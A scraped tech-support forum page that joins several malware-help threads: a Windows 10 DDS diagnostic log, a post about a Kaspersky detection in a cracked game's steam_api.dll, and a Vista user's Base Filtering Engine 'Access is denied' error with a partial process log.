R2 DiagTrack;Diagnostics Tracking Service;C:\WINDOWS\System32\svchost.exe -k utcsvc [2015-7-10 39856]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2015-8-17 1871160]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-8-17 1133880]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2015-7-10 61952]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
R2 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2015-7-10 119648]
R3 amdkmafd;AMD Audio Bus Lower Filter;C:\WINDOWS\System32\drivers\amdkmafd.sys [2012-9-23 21160]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\WINDOWS\System32\drivers\AtihdWT6.sys [2015-5-28 102912]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\WINDOWS\System32\drivers\LEqdUsb.sys [2014-3-19 77592]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\WINDOWS\System32\drivers\LHidEqd.sys [2014-3-19 13080]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
R3 LVRS64;Logitech RightSound Filter Driver;C:\WINDOWS\System32\drivers\lvrs64.sys [2015-8-20 351520]
R3 LVUVC64;@oem30.inf,%PID_0825_DD%(UVC);Logitech HD Webcam C270(UVC);C:\WINDOWS\System32\drivers\lvuvc64.sys [2015-8-20 4758176]
R3 MBAMProtector;MBAMProtector;C:\WINDOWS\System32\drivers\mbam.sys [2015-8-17 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2015-8-17 113880]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\WINDOWS\System32\drivers\mwac.sys [2015-8-17 64216]
R3 MBfilt;MBfilt;C:\WINDOWS\System32\drivers\MBfilt64.sys [2015-2-12 32344]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2015-7-10 20992]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2015-7-10 587264]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
R3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2015-7-10 362928]
R3 WSDScan;WSD Scan Support;C:\WINDOWS\System32\drivers\WSDScan.sys [2015-7-10 24576]
S2 AODDriver4.2.0;AODDriver4.2.0;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-7-20 134512]
S2 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2015-7-10 39856]
S2 NvVCagdefcZ;NvVCagdefcZ;"C:\ProgramData\eAEyagDyd\NvVCagdefcZ.exe" --> C:\ProgramData\eAEyagDyd\NvVCagdefcZ.exe [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-7-9 327296]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2015-7-10 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2015-7-10 39856]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2015-7-10 17624]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2015-7-10 39856]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2015-7-10 32256]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2015-7-10 116736]
S3 CDPSvc;CDPSvc;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-7-20 134512]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-7-10 27136]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 embeddedmode;embeddedmode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 fcvsc;fcvsc;C:\WINDOWS\System32\drivers\fcvsc.sys [2015-7-10 31232]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2015-7-10 20992]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2015-7-10 50016]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2015-7-10 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2015-7-10 122608]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2015-7-10 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2015-7-10 424800]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\WINDOWS\System32\ieetwcollector.exe [2015-7-10 115200]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2015-7-10 43872]
S3 IoQos;IoQos;C:\WINDOWS\System32\drivers\ioqos.sys [2015-7-10 26624]
S3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2015-7-10 104800]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2015-7-10 99168]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2015-7-10 705376]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2015-7-10 76128]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2015-7-10 94720]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\lsass.exe [2015-7-10 56344]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE [2014-1-23 178760]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2015-7-10 58208]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2015-7-10 58720]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2015-8-15 934752]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2015-8-15 1031680]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2015-7-10 155488]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2015-7-10 39856]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2015-8-19 80720]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2015-7-10 40288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2015-7-10 61952]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2015-8-15 46080]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2015-7-10 44032]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2015-7-10 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2015-7-10 245088]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2015-7-10 94048]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2015-7-10 127840]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2015-7-10 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2015-7-10 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2015-7-10 27488]
S3 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2015-7-10 31744]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 vmicvmsession;Hyper-V VM Session Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2015-8-15 685568]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2015-7-10 39856]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2015-7-10 26976]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2015-7-10 59232]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 WpnService;Windows Push Notifications Service;C:\WINDOWS\System32\svchost.exe -k wswpnservice [2015-7-10 39856]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2015-7-10 222720]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2015-7-10 25600]
.
=============== Created Last 30 ================
.
2015-09-17 02:24:14 16148 ----a-w- C:\WINDOWS\System32\PRAMOD_P_HistoryPrediction.bin
2015-09-17 02:21:24 -------- d-----w- C:\AdwCleaner
2015-09-16 23:55:54 -------- d-----w- C:\Program Files (x86)\e37e9aee-d8fe-4bd9-a4f8-da390760871d
2015-09-16 23:52:24 -------- d-----w- C:\WINDOWS\System32\tafi
2015-09-16 23:52:21 -------- d-----w- C:\Users\P\AppData\Local\Tempfolder
2015-09-16 23:52:06 -------- d-----w- C:\Users\P\AppData\Local\Installer
2015-09-16 23:42:23 -------- d-----w- C:\Users\P\AppData\Local\Opera Software
2015-09-16 23:42:22 -------- d-----w- C:\Users\P\AppData\Roaming\Opera Software
2015-09-16 23:37:01 11062400 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{84FD077C-67A8-496E-B6FF-AF99506EE0E7}\mpengine.dll
2015-09-15 07:48:34 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2015-09-14 05:47:20 -------- d-----w- C:\Users\P\AppData\Roaming\Anvsoft
2015-09-14 05:47:12 -------- d-----w- C:\Program Files (x86)\Anvsoft
2015-09-09 08:33:22 -------- d-----w- C:\WINDOWS\PCHEALTH
2015-09-04 00:19:36 1190000 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{12CCC164-86D5-4B2E-A076-A0276829540E}\gapaengine.dll
2015-08-30 23:26:22 113880 ----a-w- C:\WINDOWS\System32\drivers\3DA32461.sys
2015-08-23 04:17:02 -------- d-----w- C:\Program Files\CPUID
2015-08-22 05:20:59 89520 ----a-w- C:\WINDOWS\System32\atimpc64.dll
2015-08-20 03:04:41 -------- d-----w- C:\Users\P\Tracing
2015-08-20 03:04:02 -------- d-----w- C:\Users\P\AppData\Local\Logitech® Webcam Software
2015-08-20 02:59:59 40398 ----a-w- C:\WINDOWS\System32\Repository.reg
2015-08-20 02:59:58 351520 ----a-w- C:\WINDOWS\System32\drivers\lvrs64.sys
2015-08-20 02:59:58 262432 ----a-w- C:\WINDOWS\System32\lvco1380853.dll
2015-08-20 02:58:28 -------- d-----w- C:\Users\P\AppData\Local\Skype
2015-08-20 02:57:54 -------- d-----r- C:\Program Files (x86)\Skype
2015-08-19 11:52:12 26851520 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSO.DLL
2015-08-19 11:45:32 654520 ----a-w- C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSOSQM.EXE
2015-08-19 11:45:32 37402720 ----a-w- C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL
2015-08-19 07:49:59 5454848 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
.
==================== Find3M ====================
.
2015-09-17 02:24:17 113880 ----a-w- C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2015-09-02 01:20:52 77400 ----a-w- C:\WINDOWS\System32\acmigration.dll
2015-09-02 00:25:58 3586560 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2015-09-02 00:25:34 1382912 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2015-08-27 06:32:24 608936 ----a-w- C:\WINDOWS\System32\fontdrvhost.exe
2015-08-27 06:04:18 21874688 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2015-08-27 05:54:40 365568 ----a-w- C:\WINDOWS\System32\atmfd.dll
2015-08-27 05:54:26 541248 ----a-w- C:\WINDOWS\SysWow64\fontdrvhost.exe
2015-08-27 05:51:48 1774592 ----a-w- C:\WINDOWS\System32\Windows.UI.Immersive.dll
2015-08-27 05:51:42 2350592 ----a-w- C:\WINDOWS\System32\authui.dll
2015-08-27 05:49:28 1008640 ----a-w- C:\WINDOWS\System32\schedsvc.dll
2015-08-27 05:43:31 576000 ----a-w- C:\WINDOWS\System32\vbscript.dll
2015-08-27 05:42:52 187904 ----a-w- C:\WINDOWS\System32\Windows.UI.PicturePassword.dll
2015-08-27 05:42:46 596480 ----a-w- C:\WINDOWS\System32\SettingSync.dll
2015-08-27 05:42:36 184320 ----a-w- C:\WINDOWS\System32\shacct.dll
2015-08-27 05:42:25 578560 ----a-w- C:\WINDOWS\System32\winlogon.exe
2015-08-27 05:39:42 45568 ----a-w- C:\WINDOWS\System32\atmlib.dll
2015-08-27 05:23:43 303104 ----a-w- C:\WINDOWS\SysWow64\atmfd.dll
2015-08-27 05:16:41 1612288 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Immersive.dll
2015-08-27 05:16:38 2153472 ----a-w- C:\WINDOWS\SysWow64\authui.dll
2015-08-27 05:16:03 18806272 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2015-08-27 05:12:35 504320 ----a-w- C:\WINDOWS\SysWow64\vbscript.dll
2015-08-27 05:11:54 484352 ----a-w- C:\WINDOWS\SysWow64\SettingSync.dll
2015-08-27 05:11:39 139776 ----a-w- C:\WINDOWS\SysWow64\shacct.dll
2015-08-27 05:08:18 37376 ----a-w- C:\WINDOWS\SysWow64\atmlib.dll
2015-08-22 05:20:59 85472 ----a-w- C:\WINDOWS\System32\atig6pxx.dll
2015-08-20 06:07:55 8019296 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2015-08-20 06:06:53 609592 ----a-w- C:\WINDOWS\System32\ci.dll
2015-08-20 05:26:23 168960 ----a-w- C:\WINDOWS\System32\InstallAgent.exe
2015-08-20 05:21:13 193024 ----a-w- C:\WINDOWS\System32\EnterpriseModernAppMgmtCSP.dll
2015-08-18 07:56:25 2498808 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2015-08-18 07:55:45 373072 ----a-w- C:\WINDOWS\System32\drivers\USBXHCI.SYS
2015-08-18 07:54:30 1396064 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2015-08-18 07:27:23 1771592 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2015-08-18 07:24:35 963920 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2015-08-18 07:13:10 497664 ----a-w- C:\WINDOWS\System32\WlanMediaManager.dll
2015-08-18 07:13:06 387584 ----a-w- C:\WINDOWS\System32\NetSetupShim.dll
2015-08-18 07:12:20 692224 ----a-w- C:\WINDOWS\System32\drivers\UMDF\NfcCx.dll
2015-08-18 07:12:18 2225664 ----a-w- C:\WINDOWS\System32\NetworkMobileSettings.dll
2015-08-18 07:07:34 2226688 ----a-w- C:\WINDOWS\System32\wlansvc.dll
2015-08-18 07:04:20 859136 ----a-w- C:\WINDOWS\System32\modernexecserver.dll
2015-08-18 07:04:14 1234944 ----a-w- C:\WINDOWS\System32\aitstatic.exe
2015-08-18 06:59:35 1294336 ----a-w- C:\WINDOWS\System32\wcnwiz.dll
2015-08-18 06:59:02 140288 ----a-w- C:\WINDOWS\System32\WcnApi.dll
2015-08-18 06:58:46 50176 ----a-w- C:\WINDOWS\System32\WcnNetsh.dll
2015-08-18 06:58:34 112640 ----a-w- C:\WINDOWS\System32\fdWCN.dll
2015-08-18 06:58:31 117760 ----a-w- C:\WINDOWS\System32\dafWCN.dll
2015-08-18 06:58:25 187392 ----a-w- C:\WINDOWS\System32\NetSetupSvc.dll
2015-08-18 06:57:54 45568 ----a-w- C:\WINDOWS\System32\wfdprov.dll
2015-08-18 06:56:48 79872 ----a-w- C:\WINDOWS\System32\BthRadioMedia.dll
2015-08-18 06:55:01 2178560 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2015-08-18 06:54:11 247296 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2015-08-18 06:54:03 322048 ----a-w- C:\WINDOWS\System32\vaultsvc.dll
2015-08-18 06:52:26 1888768 ----a-w- C:\WINDOWS\System32\dwmcore.dll
2015-08-18 06:50:04 1795072 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.dll
2015-08-18 06:49:52 1061888 ----a-w- C:\WINDOWS\System32\reseteng.dll
2015-08-18 06:49:20 246272 ----a-w- C:\WINDOWS\System32\PackageStateRoaming.dll
2015-08-18 06:49:03 274432 ----a-w- C:\WINDOWS\SysWow64\NetSetupShim.dll
2015-08-18 06:36:08 1226752 ----a-w- C:\WINDOWS\SysWow64\wcnwiz.dll
2015-08-18 06:35:49 100352 ----a-w- C:\WINDOWS\SysWow64\WcnApi.dll
2015-08-18 06:35:18 95744 ----a-w- C:\WINDOWS\SysWow64\fdWCN.dll
2015-08-18 06:34:44 37376 ----a-w- C:\WINDOWS\SysWow64\wfdprov.dll
2015-08-18 06:29:11 1593344 ----a-w- C:\WINDOWS\SysWow64\dwmcore.dll
2015-08-18 06:26:08 195584 ----a-w- C:\WINDOWS\SysWow64\PackageStateRoaming.dll
2015-08-17 02:27:15 113880 ----a-w- C:\WINDOWS\System32\drivers\0B1C68F6.sys
2015-08-14 14:43:59 911360 ----a-w- C:\WINDOWS\System32\SharedStartModel.dll
2015-08-14 04:51:31 18960 ----a-w- C:\WINDOWS\System32\drivers\LNonPnP.sys
2015-08-14 04:51:06 0 ----a-w- C:\WINDOWS\ativpsrm.bin
2015-08-13 04:22:26 2093056 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2015-08-13 04:20:39 414208 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2015-08-13 03:53:21 311808 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2015-08-12 16:03:57 733696 ----a-w- C:\WINDOWS\System32\SkyDriveTelemetry.dll
2015-08-12 15:58:57 15360 ----a-w- C:\WINDOWS\System32\wu.upgrade.ps.dll
2015-08-12 07:18:36 9284296 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerInstaller.exe
2015-08-11 10:04:24 2462648 ----a-w- C:\WINDOWS\System32\mfcore.dll
2015-08-11 10:04:23 4532304 ----a-w- C:\WINDOWS\explorer.exe
2015-08-11 10:04:15 1087296 ----a-w- C:\WINDOWS\System32\mfplat.dll
2015-08-11 10:03:09 442208 ----a-w- C:\WINDOWS\System32\drivers\storport.sys
2015-08-11 10:02:57 554744 ----a-w- C:\WINDOWS\System32\directmanipulation.dll
2015-08-11 10:02:56 80720 ----a-w- C:\WINDOWS\System32\drivers\stornvme.sys
2015-08-11 10:02:49 292856 ----a-w- C:\WINDOWS\System32\LockAppHost.exe
2015-08-11 09:52:49 993104 ----a-w- C:\WINDOWS\System32\ReAgent.dll
2015-08-11 09:50:47 1643872 ----a-w- C:\WINDOWS\System32\diagtrack.dll
2015-08-11 09:40:22 4048808 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2015-08-11 09:40:12 918320 ----a-w- C:\WINDOWS\SysWow64\mfplat.dll
2015-08-11 09:40:08 2151208 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2015-08-11 09:38:22 454000 ----a-w- C:\WINDOWS\SysWow64\directmanipulation.dll
2015-08-11 09:37:48 243800 ----a-w- C:\WINDOWS\SysWow64\LockAppHost.exe
2015-08-11 09:26:03 845664 ----a-w- C:\WINDOWS\SysWow64\ReAgent.dll
2015-08-11 09:23:59 16706560 ----a-w- C:\WINDOWS\System32\Windows.UI.Xaml.dll
2015-08-11 09:21:13 148992 ----a-w- C:\WINDOWS\System32\tetheringservice.dll
2015-08-11 09:21:04 52224 ----a-w- C:\WINDOWS\System32\tetheringclient.dll
2015-08-11 09:20:02 483328 ----a-w- C:\WINDOWS\System32\OneDriveSettingSyncProvider.dll
2015-08-11 09:19:45 235520 ----a-w- C:\WINDOWS\System32\SettingsHandlers_Notifications.dll
2015-08-11 09:18:44 235008 ----a-w- C:\WINDOWS\System32\UserMgrProxy.dll
2015-08-11 09:16:32 2416640 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2015-08-11 09:14:02 404480 ----a-w- C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 09:13:42 413184 ----a-w- C:\WINDOWS\System32\diagtrack_win.dll
2015-08-11 09:11:40 2446336 ----a-w- C:\WINDOWS\System32\InputService.dll
2015-08-11 09:11:18 553472 ----a-w- C:\WINDOWS\System32\GamePanel.exe
.
============= FINISH: 12:51:19.27 ===============

Attached Files
File Type: txt attach.txt (21.8 KB)
File Type: txt AdwCleaner[C1].txt (7.9 KB)

Slow system - UDSDangerousObject.Multi.Generic

Well hello,

I'm a newcomer in this forum. The fact is that I've been handling my W7 OS quite laggy. Last night every single time I tried to post something in a forum, it was giving me a force close every time I tried to copy and paste a link :banghead:. I already downloaded Kaspersky Antivirus full protection but there's that notification appearing still and it wasn't unable to delete it, hence I'm here. Fortunately I came across another thread which is open in this forum (http://www.techsupportforum.com/foru...ic-738745.html), therefore here are my logs:

TDSSKiller #1: TDSSKiller1 - Pastebin.com
TDSSKiller #2: TDSSKiller2 - Pastebin.com
AdwCleaner: ADWCleaner - Pastebin.com

(I really hope I'm not breaking any rule by sharing these logs using pastebin but I wouldn't like to paste them all here since they're too long).

Besides that, this is what I know so far about the trojan or whatever it is, and also its location...

UDSDangerousObject.Multi.Generic
E:\CODEX\bin\steam_api.dll

Thanks in advance, guys!

Base Filtering Engine won't start

When I try to start Base Filtering Engine in Services it says:

'Windows could not start the Base Filtering Engine service on Local Computer - Error 5: Access is denied'

I do not have access to a Windows install disc or boot CD.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16684 BrowserJavaVersion: 11.31.2
Run by User at 18:02:39 on 2015-08-31
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.44.1033.18.2046.970 [GMT 1:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\alg.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
C:\Windows\ehome\ehtray.exe
C:\Windows\SysWOW64\CtHelper.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Google\Update\Install\{CC7A4147-B277-48F9-B90B-6A84AADA9CCB}\44.0.2403.157_44.0.2403.155_chrome_updater.exe
C:\Windows\TEMP\CR_376D0.tmp\setup.exe
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\avastUi.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
